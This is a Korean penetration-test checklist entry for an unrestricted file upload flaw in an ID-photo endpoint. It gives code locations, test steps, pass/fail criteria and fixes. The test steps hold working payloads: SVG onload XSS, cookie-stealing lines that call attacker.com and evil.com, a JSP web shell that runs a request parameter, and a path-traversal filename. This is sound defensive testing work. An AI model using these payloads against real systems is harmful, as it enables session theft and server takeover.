================================================================================
[VCE-EX-07] 악성코드 파일 업로드
도메인: exchange
================================================================================

1. 진단 항목 개요
   - 항목명: 악성코드 파일 업로드 (Unrestricted File Upload)
   - 번호: EX-07
   - 위험도: Critical
   - OWASP: A03:2021 – Injection

2. 대상 기능 & 엔드포인트
   - 로컬:  POST http://localhost:8080/api/auth/me/id-photo
   - 운영:  POST https://vceapp.com/api/auth/me/id-photo
   - HTTP 메서드: POST (multipart/form-data)
   - 인증 요건: Bearer JWT 필요 (가입 완료 후 신분증 제출 단계)

3. 취약점 원리 (Why this works)
   FileService.java:42에서 파일을 저장할 때 확장자, MIME 타입, Magic Byte 등 어떠한
   검증도 수행하지 않는다. 파일명을 UUID_원본파일명 형식으로 저장하며 uploads/ 디렉토리에
   그대로 저장한다.

   SecurityConfig.java:72에 의해 /uploads/** 경로 전체가 permitAll 처리되어 있으므로
   업로드된 파일에 인증 없이 직접 접근이 가능하다.

   공격 시나리오:
   - SVG 파일에 JavaScript 삽입 → 관리자 또는 다른 사용자가 URL 접근 시 XSS 발동
   - HTML 파일 업로드 → 피싱 페이지 호스팅
   - JSP/PHP 웹쉘 업로드 → 서버 측 코드 실행 (서버 설정에 따라)
   - 파일명에 경로 순회 문자 삽입 → 서버 설정 파일 덮어쓰기 시도

4. 테스트 절차 (Step-by-step)

   [사전 준비]
   - test@vce.com / test1234 로그인 → JWT 획득
   - Burp Suite Proxy 활성화

   Step 1. 정상 이미지 업로드 흐름 확인
   --- HTTP 요청 예시 ---
   POST /api/auth/me/id-photo HTTP/1.1
   Host: localhost:8080
   Authorization: Bearer <JWT>
   Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

   ------WebKitFormBoundary
   Content-Disposition: form-data; name="file"; filename="id.jpg"
   Content-Type: image/jpeg

   [JPEG 바이너리 데이터]
   ------WebKitFormBoundary--
   ---

   Step 2. SVG XSS 파일 업로드
   악성 SVG 파일 내용 (xss.svg):
   <?xml version="1.0" encoding="UTF-8"?>
   <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
     <circle cx="50" cy="50" r="50"/>
   </svg>

   --- HTTP 요청 예시 ---
   POST /api/auth/me/id-photo HTTP/1.1
   Host: localhost:8080
   Authorization: Bearer <JWT>
   Content-Type: multipart/form-data; boundary=----Boundary

   ------Boundary
   Content-Disposition: form-data; name="file"; filename="xss.svg"
   Content-Type: image/svg+xml

   <?xml version="1.0" encoding="UTF-8"?>
   <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
   <circle cx="50" cy="50" r="50"/></svg>
   ------Boundary--
   ---

   Step 3. Content-Type 조작 (JPEG로 위장한 SVG)
   --- HTTP 요청 예시 ---
   ------Boundary
   Content-Disposition: form-data; name="file"; filename="id.jpg"
   Content-Type: image/jpeg

   <?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect/></svg>
   ------Boundary--
   ---

   Step 4. 쿠키 탈취 페이로드 SVG 업로드
   <?xml version="1.0"?>
   <svg xmlns="http://www.w3.org/2000/svg"
     onload="fetch('https://attacker.com/steal?c='+encodeURIComponent(document.cookie))">
     <rect width="100" height="100"/>
   </svg>

   Step 5. Path Traversal 파일명 시도
   --- HTTP 요청 예시 ---
   Content-Disposition: form-data; name="file"; filename="../../uploads/webshell.jsp"
   Content-Type: image/jpeg

   <%@ page import="java.io.*" %>
   <% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); %>
   ---

   Step 6. 업로드 후 URL 직접 접근 (비인증)
   --- HTTP 요청 예시 ---
   GET /uploads/<반환된_파일명>.svg HTTP/1.1
   Host: localhost:8080
   (Authorization 헤더 없음)
   ---

   공격 페이로드 목록:
   - <?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect/></svg>
   - <svg onload="fetch('//evil.com?c='+document.cookie)">
   - <html><body><script>document.location='//evil.com?c='+document.cookie</script></body></html>
   - <%Runtime.getRuntime().exec("id")%>  (.jsp)

5. 취약 여부 판단 기준
   ✅ 취약 (Vulnerable):
      - SVG/HTML 파일 업로드 → HTTP 200 응답 + 파일 URL 반환
      - 반환된 URL 브라우저 접근 시 JavaScript 실행 (alert 팝업)
      - /uploads/ 경로에서 비인증으로 파일 다운로드 가능
   ✗ 안전 (Not Vulnerable):
      - "허용되지 않는 파일 형식입니다" HTTP 400 반환
      - 업로드는 되지만 Content-Type: application/octet-stream으로 서빙되어 실행 안 됨

6. 예상 취약 포인트 (코드 위치)
   - FileService.java:42 — storeFile() 메서드에 확장자/MIME 검증 로직 없음
   - SecurityConfig.java:72 — .requestMatchers("/uploads/**").permitAll()
   - AuthController.java — /api/auth/me/id-photo에서 FileService 직접 호출

7. 권고 조치
   - 허용 확장자 화이트리스트: .jpg, .jpeg, .png, .pdf 만 허용
   - Magic Byte 검증: JPEG(FF D8 FF), PNG(89 50 4E 47) 시그니처 확인
   - SVG 업로드 명시적 차단 (XSS 내장 가능)
   - /uploads/** 를 인증 필요로 변경 또는 별도 파일 서버로 분리
